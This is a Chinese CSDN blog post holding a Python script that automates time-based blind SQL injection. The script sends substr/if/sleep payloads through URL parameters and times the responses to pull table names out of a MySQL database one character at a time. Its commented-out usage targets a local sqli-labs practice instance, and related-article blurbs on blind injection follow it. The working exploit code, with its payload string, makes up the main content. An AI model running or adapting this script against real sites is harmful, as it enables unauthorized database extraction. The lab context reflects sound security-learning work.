SQL注入代码实践(盲注-获取数据库名长度【数字型】)

最新推荐文章于 2024-05-19 17:03:37 发布
最新推荐文章于 2024-05-19 17:03:37 发布
阅读量422 收藏
点赞数
分类专栏: 网络安全 文章标签: 数据库 sql python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DMHY123/article/details/126443074
版权 
# -*- coding: utf-8 -*-
"""
@Time : 2022/4/4 16:20
@Auth : zhangxiang
@File :BlindInject_NumTable.py
@IDE :PyCharm
@Motto:ABC(Always Be Coding)

"""
from urllib import request
from urllib import parse
import re
import time
import sys
import random
from ua_info import ua_list
from GetTableLength_Num import GetTableLength_Num


class BlindInject_NumTable:
    def __init__(self):
        pass
    def StartInject_NumTable(self,url,code,resultList,databasesName,numTable):
        flag=0
        #%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),1,1)=%27e%27,sleep(5),1)
        for num in range(0, numTable+1):

            url = url
            judgeStr = "%20and%20if(substr((select%20group_concat(table_name)%20from%20information_schema.tables" \
                       "%20where%20table_schema=%27security%27),changeNum,1)=%27replaceStr%27,sleep(2),1)"
            submitStr = "&submit=0x5375626D6974%23"
            pattern1 = r"changeNum"
            replace1 = str(num)
            FisWord = re.sub(pattern1, replace1, judgeStr)

            for x in code:
                Str = x
                word = FisWord + submitStr
                # 正则
                pattern2 = r"replaceStr"
                replace2 = Str
                SeWord = re.sub(pattern2, replace2, word)
                full_url = url + SeWord
                # print(full_url)
                # 2.发请求保存到本地
                headers = {'User-Agent':random.choice(ua_list)}
                startTime = time.time()
                req = request.Request(url=full_url, headers=headers)
                res = request.urlopen(req)

                endTime = time.time()
                allTime = endTime - startTime
                # print(allTime)
                if (resultList[flag] == "None"):
                    print("注入结束")
                    return resultList

                if (allTime > 2):
                    print("*" * 200)
                    resultList.append(x)
                    print("得到盲注结果:" + str(resultList))
                    print("注入的payload:" + full_url)
                    print("使用的时间:" + str(allTime))
                    print("*" * 200)
                    flag = flag+1


                else:
                    pass

        return resultList
    def getStr(self,resultList):  # 将列表值转为字符串
                    resultList.pop(0)
                    list2 = [str(i) for i in resultList]
                    strList = ''.join(list2)
                    return strList




# if __name__ == '__main__':
#     blindInject_NumTable = BlindInject_NumTable()
#     getTableLength_Num = GetTableLength_Num()
#
#     databasesName = "security"
#     resultList = ["开始"]
#     path = './code2.txt'
#     url = "http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-2/?id=1"
#     f = open(path, 'r', encoding='utf-8')
#     code = f.read()
#     print(resultList[0])
#     print("注入中,请稍等:")
#     numTable = getTableLength_Num.StartGetTableLength_Num(url, databasesName)
#     print("该数据库中的表名长度为:" + str(numTable))
#     resultList = blindInject_NumTable.StartInject_NumTable(url,code,resultList,databasesName,numTable)
#     strList = blindInject_NumTable.getStr(resultList)
#     print("该数据库中的表名有:"+strList)

保证四个小时充足睡眠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
asp.net获取SQL所有数据库、所有表、所有字段
10-31
asp.net获取SQL所有数据库、所有表、所有字段
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限的SQL注入SQL注入点利用以及getshell
m0_67844671的博客
10-02 1689
【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】-CSDN博客本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入盲注
4ut15m's blog
02-03 554
其他相关文章: SQL注入基础 报错注入 盲注 用于页面注入无回显并且不会打印错误信息的情况. 盲注类型 布尔型盲注,延时盲注 布尔型盲注 注入页面虽然无回显,但是根据注入造成的不同布尔值(true与false)页面会有不同的结果这便是布尔型盲注. if函数:if(condition, value_if_true, value_if_false),condition为判断条件,参...
SQL盲注获取数据库信息、绕过WAF
buffedon的博客
05-16 1433
SQL盲注利用流程及绕过WAF盲注1. 分类实现方式分类按照注入方式2. 原理3. 作用3.1 绕过WAF(规范化方法)3.2 sql盲注绕过WEB4. 利用技巧+特殊函数(盲注核心)截断函数编码函数regexp + 正则表达式模糊查询5. 流程5.1 获取当前数据库5.2 获取当前数据库中的表5.2.1 逐个读取-----limit 0,15.2.2 全部读取5.3 获取当前数据库中敏感表的列5.4 读取数据库具体单元格的值6. 利用burpsuite获取数据操作过程7. 编写python脚本7.1 布尔
python爬虫urllib使用和进阶 | Python爬虫实战二
weixin_46901205的博客
04-10 305
查看上一节:python爬虫分类和robots协议 python爬虫urllib使用和进阶 上节课已经介绍了爬虫的基本概念和基础内容,接下来就要开始内容的爬取了。 其实爬虫就是浏览器,只不过它是一个特殊的浏览器。爬取网页就是通过HTTP协议访问相应的网页,不过通过浏览器访问往往是人的行为,把这种行为变成使用程序来访问就是爬虫的过程。 用户在使用浏览器的时候,翻阅速度是比较慢的,但是爬虫在访问的时候...
SQL注入:布尔盲注和时间盲注——CTFHUB 使用Burpsuite进行半自动注入
PigletTT的博客
07-10 2229
SQL注入:布尔盲注和时间盲注——CTFHUB为例 一、原理 1.布尔盲注 ​ 布尔盲注一般在页面只会显示正确和错误两种显示,因此在这种情况下我们不知道如何去获取数据库的详细内容,包括当前所在的数据库数据库里面的表以及每个表的字段和内容了。在这种情况下需要借助一些特别的函数来判断注入的语句是否正确,从而获取数据库的信息。以下函数是进行盲注时常用的函数 length(str) //返回str字符串的长度。 1 and length(database())=4 //判断数据库字的长度是否为4
sqli labs lesson 8,布尔盲注
dhdichch的博客
04-16 3026
1.什么是布尔盲注 布尔盲注是指,利用页面返回的对错信息来间接推测数据库中的信息。 2.获取数据库 注入点很容易判断,是一个单引号的注入。 接着开始布尔盲注,我们首先当前获取数据库名称: id=1'and length(database())=20--+ 手工注入的话先用>或者<来判断长度的大致范围,我这里用Burpsuite,直接写了等于号 可以看到当值为8时,页面返回的是You are in,说明数据库长度为8 那接下来就可以挨个判断每个位置的字符了 an
sql注入进阶
qq_40909772的博客
07-17 383
一、时间注入。 1.测试过程。 测试地址:http://192.168.57.128:1237/time/time.php?id=1   当访问该地址时,页面返回yes,在网址的后面加上单引号,再次访问,页面返回no。这与Boolean注入非常相似,但是我们将采用另外一种注入方法解决——时间盲注。 时间盲注是利用sleep()或benchmark()等函数让Mysql的执行时间边长,它多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则if()的返回值为ex
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
数据库SQLserver java课程 设计-SQL Server代码类资源
06-13
SQL和java做的课程设计—学生信息管理系统。含源代码,含数据表。
mysql注入盲注语句汇总
sirius的博客
08-28 3422
目录 mysql注入盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
SQL注入常用命令详解
qq_45174221的博客
01-18 2154
当前文章都是对SQL手工注入的讲解,你对手工注入的原理有了一定了解,可以使用sqlmap一把梭,提高注入效率。
python教程入门学习】Python爬虫抓取猫眼电影排行榜
python_9988的博客
10-11 1943
本节使用 Python 爬虫抓取猫眼电影网 TOP100 排行榜(https://maoyan.com/board/4)影片信息,包括电影名称、上映时间、主演信息。 在开始编写程序之前,首先要确定页面类型(静态页面或动态页面),其次找出页面的 url 规律,最后通过分析网页元素结构来确定正则表达式,从而提取网页信息。 确定页面类型 点击右键查看页面源码,确定要抓取的数据是否存在于页面内。通过浏览得知要抓取的信息全部存在于源码内,因此该页面输属于静态页面。如下所示: <p class="n
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3724
SQL注入2——布尔型盲注(重学)
SQL注入讲课准备
weixin_62420492的博客
01-15 531
一.基本函数
SQL注入盲注
tj2718647721的博客
07-18 80
left(database(),1),database() #left(a,b)从左侧截取a的前b位。length(database())=8 #判断数据库database ()长度。ord=ascii ascii(x)=97 #判断x的asci i码是否等于97。substr(a,b,c) #从b位置开始,截取字符串a的c长度。mid(a,b,c) #从位置b开始,截取a字符串的c位。if(条件,5,0) #条件成立返回5反之返回0。基于报错的SQL盲注-报错回显。
mysql事务(原理)
最新发布
m0_74347016的博客
05-19 513
mysql事务原理
SQL注入SQL盲注的区别
04-07
SQL注入SQL盲注都是常见的安全漏洞,但它们有一些区别。 SQL注入是指攻击者通过在用户输入的数据中插入恶意的SQL代码,从而绕过应用程序的输入验证,进而执行非授权的数据库操作。攻击者可以通过SQL注入获取、修改或删除数据库中的数据,甚至执行任意的系统命令SQL注入通常发生在应用程序与数据库之间的交互过程中。 SQL盲注是一种更加隐蔽的攻击方式,攻击者无法直接获取数据库的具体信息,而是通过不断尝试和推断来获取数据。SQL盲注通常发生在应用程序对用户输入进行了过滤或转义处理的情况下。攻击者通过构造特定的SQL语句,根据应用程序返回的不同响应结果来推断出数据库中的信息。 总结一下: - SQL注入是通过插入恶意SQL代码来执行非授权的数据库操作。 - SQL盲注是通过不断尝试和推断来获取数据库中的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值